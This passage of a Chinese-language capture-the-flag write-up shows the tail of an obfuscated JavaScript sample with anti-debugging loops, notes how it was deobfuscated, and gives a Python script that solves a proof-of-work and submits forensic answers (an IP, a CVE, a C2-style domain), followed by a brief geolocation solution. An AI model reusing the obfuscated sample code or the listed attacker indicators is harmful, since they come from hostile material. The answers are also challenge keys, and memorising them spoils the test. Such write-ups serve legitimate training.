_0x5a6d64[_0x162c23(0x23e,'TF@&')](_0x6a630d);}else{if(_0x5a6d64[_0x162c23(0x1d3,'#c4u')](_0x5a6d64[_0x162c23(0x1be,'ORA9')]('',_0x5a6d64[_0x162c23(0x21b,')TRo')](_0x236119,_0x236119))[_0x5a6d64[_0x162c23(0x212,'j^nA')]],0x1)||_0x5a6d64[_0x162c23(0x185,'UpzS')](_0x5a6d64[_0x162c23(0x228,']N9a')](_0x236119,0x14),0x0)){if(_0x5a6d64[_0x162c23(0x1da,'X[kZ')](_0x5a6d64[_0x162c23(0x219,'fJhn')],_0x5a6d64[_0x162c23(0x204,'ORA9')]))while(!![]){}else debugger;}else{if(_0x5a6d64[_0x162c23(0x168,')TRo')](_0x5a6d64[_0x162c23(0x165,'D]Fd')],_0x5a6d64[_0x162c23(0x1c7,'0R*f')])){var _0x30cece=function(){while(!![]){}};return _0x27ac81[_0x162c23(0x170,'JWFg')](_0x30cece);}else debugger;}}_0x5a6d64[_0x162c23(0x1c4,'[d3G')](_0x187f4f,++_0x236119);}else{var _0x272b1f=_0x5a6d64[_0x162c23(0x1f7,'YrGO')](typeof _0x380ed3,_0x5a6d64[_0x162c23(0x1b4,'!Qo3')])?_0x1dd925:_0x5a6d64[_0x162c23(0x1f2,'ScTl')](typeof _0x1ae0b1,_0x5a6d64[_0x162c23(0x1a7,'0R*f')])&&_0x5a6d64[_0x162c23(0x1ab,'ypEV')](typeof _0x47936f,_0x5a6d64[_0x162c23(0x229,'[$(S')])&&_0x5a6d64[_0x162c23(0x169,'[$(S')](typeof _0x34b1fa,_0x5a6d64[_0x162c23(0x164,'M9KP')])?_0x5cdd6f:this,_0x15c846=_0x272b1f[_0x162c23(0x16c,'nT*h')]=_0x272b1f[_0x162c23(0x182,'KC3!')]||{},_0x391d34=[_0x5a6d64[_0x162c23(0x240,'t!ua')],_0x5a6d64[_0x162c23(0x211,'n*Ts')],_0x5a6d64[_0x162c23(0x1fa,'ypEV')],_0x5a6d64[_0x162c23(0x160,'qiA#')],_0x5a6d64[_0x162c23(0x1f9,'n*Ts')],_0x5a6d64[_0x162c23(0x1c8,'fJhn')],_0x5a6d64[_0x162c23(0x1ad,']N9a')]];for(var _0x404990=0x0;_0x5a6d64[_0x162c23(0x22d,'KC3!')](_0x404990,_0x391d34[_0x162c23(0x218,'X[kZ')]);_0x404990++){var _0x376374=_0x5a6d64[_0x162c23(0x230,'pyi$')][_0x162c23(0x23c,'k04G')]('|'),_0x557c1b=0x0;while(!![]){switch(_0x376374[_0x557c1b++]){case'0':var _0x4a557a=_0x15c846[_0x3911b1]||_0x5d5cf5;continue;case'1':_0x5d5cf5[_0x162c23(0x21e,'ORA9')]=_0x2a9bf8[_0x162c23(0x203,'Spg9')](_0x51fbef);continue;case'2':var _0x3911b1=_0x391d34[_0x404990];continue;case'3':_0x5d5cf5[_0x162c23(0x1e9,'M9KP')]=_0x4a557a[_0x162c23(0x1ec,'ScTl')][_0x162c23(0x17a,'DRFK')](_0x4a557a);continue;case'4':var _0x5d5cf5=_0x1ee7d1[_0x162c23(0x20a,'t!ua')][_0x162c23(0x231,'j^nA')][_0x162c23(0x189,'UpzS')](_0x4a31ff);continue;case'5':_0x15c846[_0x3911b1]=_0x5d5cf5;continue;}break;}}}}try{if(_0x3624b3){if(_0x5a6d64[_0x33a2cc(0x178,'UsZi')](_0x5a6d64[_0x33a2cc(0x1ac,'X[kZ')],_0x5a6d64[_0x33a2cc(0x1fb,'^woW')])){if(_0x1d18ee){var _0x7ab7da=_0x3781a2[_0x33a2cc(0x171,'Y0V*')](_0x20a489,arguments);return _0x570abc=null,_0x7ab7da;}}else return _0x187f4f;}else _0x5a6d64[_0x33a2cc(0x1aa,'fJhn')](_0x187f4f,0x0);}catch(_0xc21d1e){}}var version_ = 'jsjiami.com.v7';
可以查到是用来jsjiami.com.v7加密,在微信中搜到这篇文章
https://mp.weixin.qq.com/s/H4jhSh7KDWM7UiMCYFFzaA
提到了https://github.com/echo094/decode-js这个项目可以解密
解出来得到最后的答案
最后的exp如下:
import socket
import hashlib
from itertools import product
import string
import re
def find_prefix(target_hash, suffix, max_length=4):
charset = string.ascii_letters + string.digits
for length in range(1, max_length + 1):
for p in product(charset, repeat=length):
prefix = ''.join(p)
combined = prefix + suffix
if hashlib.sha256(combined.encode()).hexdigest() == target_hash:
return prefix
return None
def main():
host = 's1.r3.ret.sh.cn'
port = xxxxx
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
buffer = b""
while True:
data = s.recv(4096)
if not data:
print("[*] Connection closed by remote host")
break
buffer += data
text = buffer.decode(errors='ignore')
print(text, end='')
# SHA256 challenge detection
if "sha256(" in text and "== " in text:
m = re.search(r"sha256\(XXXX\+([^\)]+)\) == ([0-9a-fA-F]{64})", text)
if m:
suffix = m.group(1)
target_hash = m.group(2)
print(f"[+] Found challenge: suffix={suffix}, target={target_hash}")
prefix = find_prefix(target_hash, suffix)
if prefix is not None:
print(f"[+] Solved: XXXX = {prefix}")
s.sendall((prefix + "\n").encode())
else:
print("[-] Prefix not found within search limits.")
# Send empty response or skip
s.sendall(b"\n")
buffer = b""
elif "Q1" in text and "Answer:" in text:
s.sendall(b"23.05.4\n")
buffer = b""
elif "Q2" in text and "Answer:" in text:
s.sendall(b"156.238.233.47\n")
buffer = b""
elif "Q3" in text and "Answer:" in text:
s.sendall(b"CVE-2022-28927\n")
buffer = b""
elif "Q4" in text and "Answer:" in text:
s.sendall(b"dropbear\n")
buffer = b""
elif "Q5" in text and "Answer:" in text:
s.sendall(b"portal.r3.internal\n")
buffer = b""
elif "Q6" in text and "Answer:" in text:
s.sendall(b"nimble-bonbon-d941a8.netlify.app\n")
buffer = b""
if __name__ == "__main__":
main()
Misc
R3GIRL in Paris
知识点省流
简单的图寻
WP
ez图寻,图丢给google就能找到位置是法国巴黎13区
把位置告诉gpt,然后让其帮忙整理即可(最后作者名的顺序换一下)
